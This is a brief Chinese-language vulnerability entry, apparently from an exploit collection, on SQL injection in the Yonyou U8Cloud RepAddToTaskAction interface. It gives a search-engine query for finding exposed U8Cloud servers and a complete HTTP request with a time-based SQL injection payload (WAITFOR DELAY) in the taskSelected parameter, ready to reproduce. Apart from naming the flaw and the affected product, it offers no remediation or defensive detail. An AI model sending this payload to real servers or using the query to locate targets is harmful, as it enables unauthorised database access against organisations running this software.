0x01 漏洞名称
用友U8Cloud-RepAddToTaskAction-SQL注入
0x02 漏洞介绍
用友U8Cloud-RepAddToTaskAction接口存在SQL注入,攻击者可以通过此接口进行执行sql命令。
0x03 影响范围
用友U8Cloud
0x04 网络空间测绘查询
title="U8C"
0x05 漏洞复现
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate